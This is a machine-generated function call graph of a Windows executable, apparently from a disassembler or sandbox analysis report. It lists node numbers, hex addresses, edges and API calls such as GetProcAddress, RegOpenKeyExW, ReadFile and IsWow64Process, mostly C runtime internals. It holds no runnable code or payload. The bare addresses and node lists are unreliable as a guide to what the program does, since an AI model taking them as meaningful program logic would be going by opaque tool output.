GetProcAddress 96354->96356 96359 72e5eb 96355->96359 96357 704eb8 96356->96357 96357->96355 96358 704ebf FreeLibrary 96357->96358 96358->96355 96390 72e52a 96359->96390 96361 704eea 96361->96253 96361->96254 96363 704e8d 96362->96363 96364 704e6e GetProcAddress 96362->96364 96367 704f80 96363->96367 96365 704e7e 96364->96365 96365->96363 96366 704e86 FreeLibrary 96365->96366 96366->96363 96368 71fe0b 22 API calls 96367->96368 96369 704f95 96368->96369 96458 705722 96369->96458 96371 704fa1 __fread_nolock 96372 7050a5 96371->96372 96373 743d1d 96371->96373 96383 704fdc 96371->96383 96461 7042a2 CreateStreamOnHGlobal 96372->96461 96472 77304d 74 API calls 96373->96472 96376 743d22 96378 70511f 64 API calls 96376->96378 96377 7050f5 40 API calls 96377->96383 96379 743d45 96378->96379 96380 7050f5 40 API calls 96379->96380 96382 70506e messages 96380->96382 96382->96262 96383->96376 96383->96377 96383->96382 96467 70511f 96383->96467 96385 743d70 96384->96385 96386 705107 96384->96386 96494 72e8c4 96386->96494 96389 7728fe 27 API calls 96389->96269 96393 72e536 ___DestructExceptionObject 96390->96393 96391 72e544 96415 72f2d9 20 API calls __dosmaperr 96391->96415 96393->96391 96395 72e574 96393->96395 96394 72e549 96416 7327ec 26 API calls pre_c_initialization 96394->96416 96397 72e586 96395->96397 96398 72e579 96395->96398 96407 738061 96397->96407 96417 72f2d9 20 API calls __dosmaperr 96398->96417 96401 72e58f 96402 72e5a2 96401->96402 96403 72e595 96401->96403 96419 72e5d4 LeaveCriticalSection __fread_nolock 96402->96419 96418 72f2d9 20 API calls __dosmaperr 96403->96418 96405 72e554 __fread_nolock 96405->96361 96408 73806d ___DestructExceptionObject 96407->96408 96420 732f5e EnterCriticalSection 96408->96420 96410 73807b 96421 7380fb 96410->96421 96414 7380ac __fread_nolock 96414->96401 96415->96394 96416->96405 96417->96405 96418->96405 96419->96405 96420->96410 96429 73811e 96421->96429 96422 738177 96439 734c7d 96422->96439 96427 738189 96433 738088 96427->96433 96452 733405 11 API calls 2 library calls 96427->96452 96429->96422 96429->96433 96437 72918d EnterCriticalSection 96429->96437 96438 7291a1 LeaveCriticalSection 96429->96438 96430 7381a8 96453 72918d EnterCriticalSection 96430->96453 96434 7380b7 96433->96434 96457 732fa6 LeaveCriticalSection 96434->96457 96436 7380be 96436->96414 96437->96429 96438->96429 96444 734c8a pre_c_initialization 96439->96444 96440 734cca 96455 72f2d9 20 API calls __dosmaperr 96440->96455 96441 734cb5 RtlAllocateHeap 96442 734cc8 96441->96442 96441->96444 96446 7329c8 96442->96446 96444->96440 96444->96441 96454 724ead 7 API calls 2 library calls 96444->96454 96447 7329d3 RtlFreeHeap 96446->96447 96448 7329fc __dosmaperr 96446->96448 96447->96448 96449 7329e8 96447->96449 96448->96427 96456 72f2d9 20 API calls __dosmaperr 96449->96456 96451 7329ee GetLastError 96451->96448 96452->96430 96453->96433 96454->96444 96455->96442 96456->96451 96457->96436 96459 71fddb 22 API calls 96458->96459 96460 705734 96459->96460 96460->96371 96462 7042bc FindResourceExW 96461->96462 96466 7042d9 96461->96466 96463 7435ba LoadResource 96462->96463 96462->96466 96464 7435cf SizeofResource 96463->96464 96463->96466 96465 7435e3 LockResource 96464->96465 96464->96466 96465->96466 96466->96383 96468 743d90 96467->96468 96469 70512e 96467->96469 96473 72ece3 96469->96473 96472->96376 96476 72eaaa 96473->96476 96475 70513c 96475->96383 96479 72eab6 ___DestructExceptionObject 96476->96479 96477 72eac2 96489 72f2d9 20 API calls __dosmaperr 96477->96489 96478 72eae8 96491 72918d EnterCriticalSection 96478->96491 96479->96477 96479->96478 96481 72eac7 96490 7327ec 26 API calls pre_c_initialization 96481->96490 96484 72eaf4 96492 72ec0a 62 API calls 2 library calls 96484->96492 96486 72eb08 96493 72eb27 LeaveCriticalSection __fread_nolock 96486->96493 96488 72ead2 __fread_nolock 96488->96475 96489->96481 96490->96488 96491->96484 96492->96486 96493->96488 96497 72e8e1 96494->96497 96496 705118 96496->96389 96498 72e8ed ___DestructExceptionObject 96497->96498 96499 72e92d 96498->96499 96501 72e925 __fread_nolock 96498->96501 96505 72e900 ___scrt_fastfail 96498->96505 96510 72918d EnterCriticalSection 96499->96510 96501->96496 96502 72e937 96511 72e6f8 96502->96511 96524 72f2d9 20 API calls __dosmaperr 96505->96524 96506 72e91a 96525 7327ec 26 API calls pre_c_initialization 96506->96525 96510->96502 96513 72e70a ___scrt_fastfail 96511->96513 96517 72e727 96511->96517 96512 72e717 96599 72f2d9 20 API calls __dosmaperr 96512->96599 96513->96512 96513->96517 96520 72e76a __fread_nolock 96513->96520 96515 72e71c 96600 7327ec 26 API calls pre_c_initialization 96515->96600 96526 72e96c LeaveCriticalSection __fread_nolock 96517->96526 96518 72e886 ___scrt_fastfail 96602 72f2d9 20 API calls __dosmaperr 96518->96602 96520->96517 96520->96518 96527 72d955 96520->96527 96534 738d45 96520->96534 96601 72cf78 26 API calls 4 library calls 96520->96601 96524->96506 96525->96501 96526->96501 96528 72d961 96527->96528 96529 72d976 96527->96529 96603 72f2d9 20 API calls __dosmaperr 96528->96603 96529->96520 96531 72d966 96604 7327ec 26 API calls pre_c_initialization 96531->96604 96533 72d971 96533->96520 96535 738d57 96534->96535 96536 738d6f 96534->96536 96614 72f2c6 20 API calls __dosmaperr 96535->96614 96538 7390d9 96536->96538 96543 738db4 96536->96543 96630 72f2c6 20 API calls __dosmaperr 96538->96630 96539 738d5c 96615 72f2d9 20 API calls __dosmaperr 96539->96615 96542 7390de 96631 72f2d9 20 API calls __dosmaperr 96542->96631 96544 738d64 96543->96544 96546 738dbf 96543->96546 96550 738def 96543->96550 96544->96520 96616 72f2c6 20 API calls __dosmaperr 96546->96616 96547 738dcc 96632 7327ec 26 API calls pre_c_initialization 96547->96632 96549 738dc4 96617 72f2d9 20 API calls __dosmaperr 96549->96617 96553 738e08 96550->96553 96554 738e4a 96550->96554 96555 738e2e 96550->96555 96553->96555 96589 738e15 96553->96589 96621 733820 21 API calls 2 library calls 96554->96621 96618 72f2c6 20 API calls __dosmaperr 96555->96618 96558 738e33 96619 72f2d9 20 API calls __dosmaperr 96558->96619 96559 738e61 96562 7329c8 _free 20 API calls 96559->96562 96565 738e6a 96562->96565 96563 738fb3 96566 739029 96563->96566 96570 738fcc GetConsoleMode 96563->96570 96564 738e3a 96620 7327ec 26 API calls pre_c_initialization 96564->96620 96568 7329c8 _free 20 API calls 96565->96568 96569 73902d ReadFile 96566->96569 96571 738e71 96568->96571 96572 7390a1 GetLastError 96569->96572 96573 739047 96569->96573 96570->96566 96574 738fdd 96570->96574 96575 738e96 96571->96575 96576 738e7b 96571->96576 96577 739005 96572->96577 96578 7390ae 96572->96578 96573->96572 96579 73901e 96573->96579 96574->96569 96580 738fe3 ReadConsoleW 96574->96580 96624 739424 28 API calls __wsopen_s 96575->96624 96622 72f2d9 20 API calls __dosmaperr 96576->96622 96596 738e45 __fread_nolock 96577->96596 96625 72f2a3 20 API calls __dosmaperr 96577->96625 96628 72f2d9 20 API calls __dosmaperr 96578->96628 96592 739083 96579->96592 96593 73906c 96579->96593 96579->96596 96580->96579 96581 738fff GetLastError 96580->96581 96581->96577 96582 7329c8 _free 20 API calls 96582->96544 96587 738e80 96623 72f2c6 20 API calls __dosmaperr 96587->96623 96588 7390b3 96629 72f2c6 20 API calls __dosmaperr 96588->96629 96605 73f89b 96589->96605 96595 73909a 96592->96595 96592->96596 96626 738a61 31 API calls 3 library calls 96593->96626 96627 7388a1 29 API calls __wsopen_s 96595->96627 96596->96582 96598 73909f 96598->96596 96599->96515 96600->96517 96601->96520 96602->96515 96603->96531 96604->96533 96606 73f8b5 96605->96606 96607 73f8a8 96605->96607 96610 73f8c1 96606->96610 96634 72f2d9 20 API calls __dosmaperr 96606->96634 96633 72f2d9 20 API calls __dosmaperr 96607->96633 96609 73f8ad 96609->96563 96610->96563 96612 73f8e2 96635 7327ec 26 API calls pre_c_initialization 96612->96635 96614->96539 96615->96544 96616->96549 96617->96547 96618->96558 96619->96564 96620->96596 96621->96559 96622->96587 96623->96596 96624->96589 96625->96596 96626->96596 96627->96598 96628->96588 96629->96596 96630->96542 96631->96547 96632->96544 96633->96609 96634->96612 96635->96609 96636->96291 96637->96309 96639 7722d9 96638->96639 96640 7722e7 96638->96640 96641 72e5eb 29 API calls 96639->96641 96642 77232c 96640->96642 96643 72e5eb 29 API calls 96640->96643 96666 7722f0 96640->96666 96641->96640 96667 772557 96642->96667 96645 772311 96643->96645 96645->96642 96647 77231a 96645->96647 96646 772370 96648 772395 96646->96648 96649 772374 96646->96649 96650 72e678 67 API calls 96647->96650 96647->96666 96671 772171 96648->96671 96652 772381 96649->96652 96654 72e678 67 API calls 96649->96654 96650->96666 96657 72e678 67 API calls 96652->96657 96652->96666 96653 77239d 96655 7723c3 96653->96655 96656 7723a3 96653->96656 96654->96652 96678 7723f3 96655->96678 96658 7723b0 96656->96658 96660 72e678 67 API calls 96656->96660 96657->96666 96661 72e678 67 API calls 96658->96661 96658->96666 96660->96658 96661->96666 96662 7723ca 96663 7723de 96662->96663 96686 72e678 96662->96686 96665 72e678 67 API calls 96663->96665 96663->96666 96665->96666 96666->96311 96668 77257c 96667->96668 96670 772565 __fread_nolock 96667->96670 96669 72e8c4 __fread_nolock 40 API calls 96668->96669 96669->96670 96670->96646 96672 72ea0c ___std_exception_copy 21 API calls 96671->96672 96673 77217f 96672->96673 96674 72ea0c ___std_exception_copy 21 API calls 96673->96674 96675 772190 96674->96675 96676 72ea0c ___std_exception_copy 21 API calls 96675->96676 96677 77219c 96676->96677 96677->96653 96685 772408 96678->96685 96679 7724c0 96703 772724 96679->96703 96681 7724c7 96681->96662 96682 7721cc 40 API calls 96682->96685 96685->96679 96685->96681 96685->96682 96699 772606 96685->96699 96707 772269 40 API calls 96685->96707 96687 72e684 ___DestructExceptionObject 96686->96687 96688 72e695 96687->96688 96689 72e6aa 96687->96689 96781 72f2d9 20 API calls __dosmaperr 96688->96781 96698 72e6a5 __fread_nolock 96689->96698 96764 72918d EnterCriticalSection 96689->96764 96692 72e69a 96782 7327ec 26 API calls pre_c_initialization 96692->96782 96693 72e6c6 96765 72e602 96693->96765 96696 72e6d1 96783 72e6ee LeaveCriticalSection __fread_nolock 96696->96783 96698->96663 96700 772617 96699->96700 96701 77261d 96699->96701 96700->96701 96708 7726d7 96700->96708 96701->96685 96704 772731 96703->96704 96705 772742 96703->96705 96706 72dbb3 65 API calls 96704->96706 96705->96681 96706->96705 96707->96685 96709 772703 96708->96709 96710 772714 96708->96710 96712 72dbb3 96709->96712 96710->96700 96713 72dbc1 96712->96713 96714 72dbdd 96712->96714 96713->96714 96715 72dbe3 96713->96715 96716 72dbcd 96713->96716 96714->96710 96721 72d9cc 96715->96721 96724 72f2d9 20 API calls __dosmaperr 96716->96724 96719 72dbd2 96725 7327ec 26 API calls pre_c_initialization 96719->96725 96726 72d97b 96721->96726 96723 72d9f0 96723->96714 96724->96719 96725->96714 96727 72d987 ___DestructExceptionObject 96726->96727 96734 72918d EnterCriticalSection 96727->96734 96729 72d995 96735 72d9f4 96729->96735 96733 72d9b3 __fread_nolock 96733->96723 96734->96729 96743 7349a1 96735->96743 96741 72d9a2 96742 72d9c0 LeaveCriticalSection __fread_nolock 96741->96742 96742->96733 96744 72d955 __fread_nolock 26 API calls 96743->96744 96745 7349b0 96744->96745 96746 73f89b __fread_nolock 26 API calls 96745->96746 96747 7349b6 96746->96747 96748 733820 __fread_nolock 21 API calls 96747->96748 96751 72da09 96747->96751 96749 734a15 96748->96749 96750 7329c8 _free 20 API calls 96749->96750 96750->96751 96752 72da3a 96751->96752 96754 72da4c 96752->96754 96758 72da24 96752->96758 96753 72da5a 96755 72f2d9 __dosmaperr 20 API calls 96753->96755 96754->96753 96754->96758 96762 72da85 __fread_nolock 96754->96762 96756 72da5f 96755->96756 96757 7327ec pre_c_initialization 26 API calls 96756->96757 96757->96758 96763 734a56 62 API calls 96758->96763 96759 72dc0b 62 API calls 96759->96762 96760 72d955 __fread_nolock 26 API calls 96760->96762 96761 7359be __wsopen_s 62 API calls 96761->96762 96762->96758 96762->96759 96762->96760 96762->96761 96763->96741 96764->96693 96766 72e624 96765->96766 96767 72e60f 96765->96767 96773 72e61f 96766->96773 96784 72dc0b 96766->96784 96809 72f2d9 20 API calls __dosmaperr 96767->96809 96769 72e614 96810 7327ec 26 API calls pre_c_initialization 96769->96810 96773->96696 96776 72d955 __fread_nolock 26 API calls 96777 72e646 96776->96777 96794 73862f 96777->96794 96780 7329c8 _free 20 API calls 96780->96773 96781->96692 96782->96698 96783->96698 96785 72dc1f 96784->96785 96786 72dc23 96784->96786 96790 734d7a 96785->96790 96786->96785 96787 72d955 __fread_nolock 26 API calls 96786->96787 96788 72dc43 96787->96788 96811 7359be 96788->96811 96791 734d90 96790->96791 96793 72e640 96790->96793 96792 7329c8 _free 20 API calls 96791->96792 96791->96793 96792->96793 96793->96776 96795 738653 96794->96795 96796 73863e 96794->96796 96798 73868e 96795->96798 96803 73867a 96795->96803 96934 72f2c6 20 API calls __dosmaperr 96796->96934 96936 72f2c6 20 API calls __dosmaperr 96798->96936 96800 738643 96935 72f2d9 20 API calls __dosmaperr 96800->96935 96801 738693 96937 72f2d9 20 API calls __dosmaperr 96801->96937 96931 738607 96803->96931 96806 72e64c 96806->96773 96806->96780 96807 73869b 96938 7327ec 26 API calls pre_c_initialization 96807->96938 96809->96769 96810->96773 96812 7359ca ___DestructExceptionObject 96811->96812 96813 7359d2 96812->96813 96814 7359ea 96812->96814 96890 72f2c6 20 API calls __dosmaperr 96813->96890 96816 735a88 96814->96816 96820 735a1f 96814->96820 96895 72f2c6 20 API calls __dosmaperr 96816->96895 96817 7359d7 96891 72f2d9 20 API calls __dosmaperr 96817->96891 96836 735147 EnterCriticalSection 96820->96836 96821 735a8d 96896 72f2d9 20 API calls __dosmaperr 96821->96896 96824 735a25 96826 735a41 96824->96826 96827 735a56 96824->96827 96825 735a95 96897 7327ec 26 API calls pre_c_initialization 96825->96897 96892 72f2d9 20 API calls __dosmaperr 96826->96892 96837 735aa9 96827->96837 96829 7359df __fread_nolock 96829->96785 96832 735a51 96894 735a80 LeaveCriticalSection __wsopen_s 96832->96894 96833 735a46 96893 72f2c6 20 API calls __dosmaperr 96833->96893 96836->96824 96838 735ad7 96837->96838 96878 735ad0 96837->96878 96839 735adb 96838->96839 96840 735afa 96838->96840 96905 72f2c6 20 API calls __dosmaperr 96839->96905 96843 735b4b 96840->96843 96844 735b2e 96840->96844 96848 735b61 96843->96848 96911 739424 28 API calls __wsopen_s 96843->96911 96908 72f2c6 20 API calls __dosmaperr 96844->96908 96845 735cb1 96845->96832 96846 735ae0 96906 72f2d9 20 API calls __dosmaperr 96846->96906 96898 73564e 96848->96898 96851 735b33 96909 72f2d9 20 API calls __dosmaperr 96851->96909 96922 720a8c 96878->96922 96890->96817 96891->96829 96892->96833 96893->96832 96894->96829 96895->96821 96896->96825 96897->96829 96899 73f89b __fread_nolock 26 API calls 96898->96899 96905->96846 96908->96851 96911->96848 96923 720a97 IsProcessorFeaturePresent 96922->96923 96924 720a95 96922->96924 96926 720c5d 96923->96926 96924->96845 96930 720c21 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 96926->96930 96939 738585 96931->96939 96934->96800 96935->96806 96936->96801 96937->96807 96938->96806 96940 738591 ___DestructExceptionObject 96939->96940 96950 735147 EnterCriticalSection 96940->96950 96942 73859f 96943 7385d1 96942->96943 96944 7385c6 96942->96944 96966 72f2d9 20 API calls __dosmaperr 96943->96966 96951 7386ae 96944->96951 96947 7385cc 96967 7385fb LeaveCriticalSection __wsopen_s 96947->96967 96950->96942 96968 7353c4 96951->96968 96966->96947 96988 701098 96993 7042de 96988->96993 96992 7010a7 96994 70a961 22 API calls 96993->96994 96995 7042f5 GetVersionExW 96994->96995 96996 706b57 22 API calls 96995->96996 96997 704342 96996->96997 96998 7093b2 22 API calls 96997->96998 97008 704378 96997->97008 96999 70436c 96998->96999 97001 7037a0 22 API calls 96999->97001 97000 70441b GetCurrentProcess IsWow64Process 97002 704437 97000->97002 97001->97008 97004 743824 GetSystemInfo 97002->97004 97005 70444f LoadLibraryA 97002->97005 97003 7437df 97006 704460 GetProcAddress 97005->97006 97007 70449c GetSystemInfo 97005->97007 97006->97007 97009 704470 GetNativeSystemInfo 97006->97009 97010 704476 97007->97010 97008->97000 97008->97003 97009->97010 97011 70109d 97010->97011 97012 70447a FreeLibrary 97010->97012 97013 7200a3 29 API calls __onexit 97011->97013 97012->97011 97013->96992 97014 7390fa 97015 739107 97014->97015 97018 73911f 97014->97018 97064 72f2d9 20 API calls __dosmaperr 97015->97064 97017 73910c 97065 7327ec 26 API calls pre_c_initialization 97017->97065 97020 73917a 97018->97020 97028 739117 97018->97028 97066 73fdc4 21 API calls 2 library calls 97018->97066 97022 72d955 __fread_nolock 26 API calls 97020->97022 97023 739192 97022->97023 97034 738c32 97023->97034 97025 739199 97026 72d955 __fread_nolock 26 API calls 97025->97026 97025->97028 97027 7391c5 97026->97027 97027->97028 97029 72d955 __fread_nolock 26 API calls 97027->97029 97030 7391d3 97029->97030 97030->97028 97031 72d955 __fread_nolock 26 API calls 97030->97031 97032 7391e3 97031->97032 97033 72d955 __fread_nolock 26 API calls 97032->97033 97033->97028 97035 738c3e ___DestructExceptionObject 97034->97035 97036 738c46 97035->97036 97037 738c5e 97035->97037 97068 72f2c6 20 API calls __dosmaperr 97036->97068 97038 738d24 97037->97038 97042 738c97 97037->97042 97075 72f2c6 20 API calls __dosmaperr 97038->97075 97041 738c4b 97069 72f2d9 20 API calls __dosmaperr 97041->97069 97045 738ca6 97042->97045 97046 738cbb 97042->97046 97043 738d29 97076 72f2d9 20 API calls __dosmaperr 97043->97076 97070 72f2c6 20 API calls __dosmaperr 97045->97070 97067 735147 EnterCriticalSection 97046->97067 97050 738cb3 97077 7327ec 26 API calls pre_c_initialization 97050->97077 97051 738cab 97071 72f2d9 20 API calls __dosmaperr 97051->97071 97052 738cc1 97055 738cf2 97052->97055 97056 738cdd 97052->97056 97053 738c53 __fread_nolock 97053->97025 97058 738d45 __fread_nolock 38 API calls 97055->97058 97072 72f2d9 20 API calls __dosmaperr 97056->97072 97060 738ced 97058->97060 97074 738d1c LeaveCriticalSection __wsopen_s 97060->97074 97061 738ce2 97073 72f2c6 20 API calls __dosmaperr 97061->97073 97064->97017 97065->97028 97066->97020 97067->97052 97068->97041 97069->97053 97070->97051 97071->97050 97072->97061 97073->97060 97074->97053 97075->97043 97076->97050 97077->97053 97078 7203fb 97079 720407 ___DestructExceptionObject 97078->97079 97107 71feb1 97079->97107 97081 72040e 97082 720561 97081->97082 97085 720438 97081->97085 97134 72083f IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter ___scrt_fastfail 97082->97134 97084 720568 97135 724e52 28 API calls _abort 97084->97135 97096 720477 ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 97085->97096 97118 73247d 97085->97118 97087 72056e 97136 724e04 28 API calls _abort 97087->97136 97091 720576 97092 720457 97094 7204d8 97126 720959 97094->97126 97096->97094 97130 724e1a 38 API calls 3 library calls 97096->97130 97098 7204de 97099 7204f3 97098->97099 97131 720992 GetModuleHandleW 97099->97131 97101 7204fa 97101->97084 97102 7204fe 97101->97102 97103 720507 97102->97103 97132 724df5 28 API calls _abort 97102->97132 97133 720040 13 API calls 2 library calls 97103->97133 97106 72050f 97106->97092 97108 71feba 97107->97108 97137 720698 IsProcessorFeaturePresent 97108->97137 97110 71fec6 97138 722c94 10 API calls 3 library calls 97110->97138 97112 71fecb 97113 71fecf 97112->97113 97139 732317 97112->97139 97113->97081 97116 71fee6 97116->97081 97121 732494 97118->97121 97119 720a8c _ValidateLocalCookies 5 API calls 97120 720451 97119->97120 97120->97092 97122 732421 97120->97122 97121->97119 97123 732450 97122->97123 97124 720a8c _ValidateLocalCookies 5 API calls 97123->97124 97125 732479 97124->97125 97125->97096 97190 722340 97126->97190 97129 72097f 97129->97098 97130->97094 97131->97101 97132->97103 97133->97106 97134->97084 97135->97087 97136->97091 97137->97110 97138->97112 97143 73d1f6 97139->97143 97142 722cbd 8 API calls 3 library calls 97142->97113 97144 73d213 97143->97144 97147 73d20f 97143->97147 97144->97147 97149 734bfb 97144->97149 97145 720a8c _ValidateLocalCookies 5 API calls 97146 71fed8 97145->97146 97146->97116 97146->97142 97147->97145 97150 734c07 ___DestructExceptionObject 97149->97150 97161 732f5e EnterCriticalSection 97150->97161 97152 734c0e 97162 7350af 97152->97162 97154 734c1d 97155 734c2c 97154->97155 97175 734a8f 29 API calls 97154->97175 97177 734c48 LeaveCriticalSection _abort 97155->97177 97158 734c27 97176 734b45 GetStdHandle GetFileType 97158->97176 97159 734c3d __fread_nolock 97159->97144 97161->97152 97163 7350bb ___DestructExceptionObject 97162->97163 97164 7350c8 97163->97164 97165 7350df 97163->97165 97186 72f2d9 20 API calls __dosmaperr 97164->97186 97178 732f5e EnterCriticalSection 97165->97178 97168 7350cd 97187 7327ec 26 API calls pre_c_initialization 97168->97187 97169 7350eb 97174 735117 97169->97174 97179 735000 97169->97179 97173 7350d7 __fread_nolock 97173->97154 97188 73513e LeaveCriticalSection _abort 97174->97188 97175->97158 97176->97155 97177->97159 97178->97169 97180 734c7d pre_c_initialization 20 API calls 97179->97180 97181 735012 97180->97181 97185 73501f 97181->97185 97189 733405 11 API calls 2 library calls 97181->97189 97182 7329c8 _free 20 API calls 97184 735071 97182->97184 97184->97169 97185->97182 97186->97168 97187->97173 97188->97173 97189->97181 97191 72096c GetStartupInfoW 97190->97191 97191->97129 97192 70105b 97197 70344d 97192->97197 97194 70106a 97228 7200a3 29 API calls __onexit 97194->97228 97196 701074 97198 70345d __wsopen_s 97197->97198 97199 70a961 22 API calls 97198->97199 97200 703513 97199->97200 97201 703a5a 24 API calls 97200->97201 97202 70351c 97201->97202 97229 703357 97202->97229 97205 7033c6 22 API calls 97206 703535 97205->97206 97207 70515f 22 API calls 97206->97207 97208 703544 97207->97208 97209 70a961 22 API calls 97208->97209 97210 70354d 97209->97210 97211 70a6c3 22 API calls 97210->97211 97212 703556 RegOpenKeyExW 97211->97212 97213 743176 RegQueryValueExW 97212->97213 97218 703578 97212->97218 97214 743193 97213->97214 97215 74320c RegCloseKey 97213->97215 97216 71fe0b 22 API calls 97214->97216 97215->97218 97226 74321e _wcslen 97215->97226 97217 7431ac 97216->97217 97219 705722 22 API calls 97217->97219 97218->97194 97220 7431b7 RegQueryValueExW 97219->97220 97221 7431d4 97220->97221 97223 7431ee messages 97220->97223 97222 706b57 22 API calls 97221->97222 97222->97223 97223->97215 97224 709cb3 22 API calls 97224->97226 97225 70515f 22 API calls 97225->97226 97226->97218 97226->97224 97226->97225 97227 704c6d 22 API calls 97226->97227 97227->97226 97228->97196 97230 741f50 __wsopen_s 97229->97230 97231 703364 GetFullPathNameW 97230->97231 97232 703386 97231->97232 97233 706b57 22 API calls 97232->97233 97234 7033a4 97233->97234 97234->97205 97235 70f7bf 97236 70f7d3 97235->97236 97237 70fcb6 97235->97237 97239 70fcc2 97236->97239 97240 71fddb 22 API calls 97236->97240 97330 70aceb 23 API calls messages 97237->97330 97331 70aceb 23 API calls messages 97239->97331 97242 70f7e5 97240->97242 97242->97239 97243 70f83e 97242->97243 97244 70fd3d 97242->97244 97261 70ed9d messages 97243->97261 97270 711310 97243->97270 97332 771155 22 API calls 97244->97332 97247 754beb 97336 77359c 82 API calls __wsopen_s 97247->97336 97249 70fef7 97254 70a8c7 22 API calls 97249->97254 97249->97261 97251 754600 97256 70a8c7 22 API calls 97251->97256 97251->97261 97252 754b0b 97334 77359c 82 API calls __wsopen_s 97252->97334 97254->97261 97256->97261 97258 70a8c7 22 API calls 97267 70ec76 messages 97258->97267 97259 70fbe3 97259->97261 97262 754bdc 97259->97262 97269 70f3ae messages 97259->97269 97260 70a961 22 API calls 97260->97267 97335 77359c 82 API calls __wsopen_s 97262->97335 97264 7200a3 29 API calls pre_c_initialization 97264->97267 97265 720242 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection WaitForSingleObjectEx EnterCriticalSection 97265->97267 97266 71fddb 22 API calls 97266->97267 97267->97247 97267->97249 97267->97251 97267->97252 97267->97258 97267->97259 97267->97260 97267->97261 97267->97264 97267->97265 97267->97266 97268 7201f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent __Init_thread_footer 97267->97268 97267->97269 97328 7101e0 256 API calls 2 library calls 97267->97328 97329 7106a0 41 API calls messages 97267->97329 97268->97267 97269->97261 97333 77359c 82 API calls __wsopen_s 97269->97333 97271 7117b0 97270->97271 97272 711376 97270->97272 97551 720242 5 API calls __Init_thread_wait 97271->97551 97273 711390 97272->97273 97274 756331 97272->97274 97337 711940 97273->97337 97556 78709c 256 API calls 97274->97556 97278 7117ba 97281 7117fb 97278->97281 97283 709cb3 22 API calls 97278->97283 97280 75633d 97280->97267 97285 756346 97281->97285 97287 71182c 97281->97287 97282 711940 9 API calls 97284 7113b6 97282->97284 97290 7117d4 97283->97290 97284->97281 97286 7113ec 97284->97286 97557 77359c 82 API calls __wsopen_s 97285->97557 97286->97285 97310 711408 __fread_nolock 97286->97310 97553 70aceb 23 API calls messages 97287->97553 97552 7201f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 97290->97552 97291 711839 97554 71d217 256 API calls 97291->97554 97294 75636e 97558 77359c 82 API calls __wsopen_s 97294->97558 97295 71152f 97297 7563d1 97295->97297 97298 71153c 97295->97298 97560 785745 54 API calls _wcslen 97297->97560 97300 711940 9 API calls 97298->97300 97301 711549 97300->97301 97305 7564fa 97301->97305 97307 711940 9 API calls 97301->97307 97302 71fddb 22 API calls 97302->97310 97303 711872 97555 71faeb 23 API calls 97303->97555 97304 71fe0b 22 API calls 97304->97310 97316 756369 97305->97316 97561 77359c 82 API calls __wsopen_s 97305->97561 97312 711563 97307->97312 97309 70ec40 256 API calls 97309->97310 97310->97291 97310->97294 97310->97295 97310->97302 97310->97304 97310->97309 97311 7563b2 97310->97311 97310->97316 97559 77359c 82 API calls __wsopen_s 97311->97559 97312->97305 97314 70a8c7 22 API calls 97312->97314 97317 7115c7 messages 97312->97317 97314->97317 97315 711940 9 API calls 97315->97317 97316->97267 97317->97303 97317->97305 97317->97315 97317->97316 97320 71167b messages 97317->97320 97325 704f39 68 API calls 97317->97325 97347 78958b 97317->97347 97350 78959f 97317->97350 97353 776ef1 97317->97353 97433 76d4ce 97317->97433 97436 77744a 97317->97436 97493 71effa 97317->97493 97318 71171d 97318->97267 97320->97318 97550 71ce17 22 API calls messages 97320->97550 97325->97317 97328->97267 97329->97267 97330->97239 97331->97244 97332->97261 97333->97261 97334->97261 97335->97247 97336->97261 97338 711981 97337->97338 97343 71195d 97337->97343 97562 720242 5 API calls __Init_thread_wait 97338->97562 97341 71198b 97341->97343 97563 7201f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 97341->97563 97342 718727 97346 7113a0 97342->97346 97565 7201f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 97342->97565 97343->97346 97564 720242 5 API calls __Init_thread_wait 97343->97564 97346->97282 97566 787f59 97347->97566 97349 78959b 97349->97317 97351 787f59 120 API calls 97350->97351 97352 7895af 97351->97352 97352->97317 97354 70a961 22 API calls 97353->97354 97355 776f1d 97354->97355 97356 70a961 22 API calls 97355->97356 97357 776f26 97356->97357 97358 776f3a 97357->97358 97850 70b567 97357->97850 97360 707510 53 API calls 97358->97360 97361 776f57 _wcslen 97360->97361 97362 7770bf 97361->97362 97363 776fbc 97361->97363 97374 7770e9 97361->97374 97364 704ecb 94 API calls 97362->97364 97365 707510 53 API calls 97363->97365 97366 7770d0 97364->97366 97367 776fc8 97365->97367 97368 7770e5 97366->97368 97370 704ecb 94 API calls 97366->97370 97369 70a8c7 22 API calls 97367->97369 97376 776fdb 97367->97376 97371 70a961 22 API calls 97368->97371 97368->97374 97369->97376 97370->97368 97372 77711a 97371->97372 97373 70a961 22 API calls 97372->97373 97377 777126 97373->97377 97374->97317 97375 777027 97379 707510 53 API calls 97375->97379 97376->97375 97378 777005 97376->97378 97381 70a8c7 22 API calls 97376->97381 97380 70a961 22 API calls 97377->97380 97382 7033c6 22 API calls 97378->97382 97383 777034 97379->97383 97386 77712f 97380->97386 97381->97378 97387 77700f 97382->97387 97384 777047 97383->97384 97385 77703d 97383->97385 97855 76e199 GetFileAttributesW 97384->97855 97388 70a8c7 22 API calls 97385->97388 97390 70a961 22 API calls 97386->97390 97391 707510 53 API calls 97387->97391 97388->97384 97393 777138 97390->97393 97394 77701b 97391->97394 97392 777050 97395 777063 97392->97395 97398 704c6d 22 API calls 97392->97398 97396 707510 53 API calls 97393->97396 97397 706350 22 API calls 97394->97397 97400 707510 53 API calls 97395->97400 97405 777069 97395->97405 97399 777145 97396->97399 97397->97375 97398->97395 97699 70525f 97399->97699 97402 7770a0 97400->97402 97856 76d076 57 API calls 97402->97856 97403 777166 97406 704c6d 22 API calls 97403->97406 97405->97374 97407 777175 97406->97407 97408 7771a9 97407->97408 97410 704c6d 22 API calls 97407->97410 97409 70a8c7 22 API calls 97408->97409 97411 7771ba 97409->97411 97412 777186 97410->97412 97413 706350 22 API calls 97411->97413 97412->97408 97414 706b57 22 API calls 97412->97414 97415 7771c8 97413->97415 97416 77719b 97414->97416 97417 706350 22 API calls 97415->97417 97418 706b57 22 API calls 97416->97418 97419 7771d6 97417->97419 97418->97408 97420 706350 22 API calls 97419->97420 97421 7771e4 97420->97421 97422 707510 53 API calls 97421->97422 97423 7771f0 97422->97423 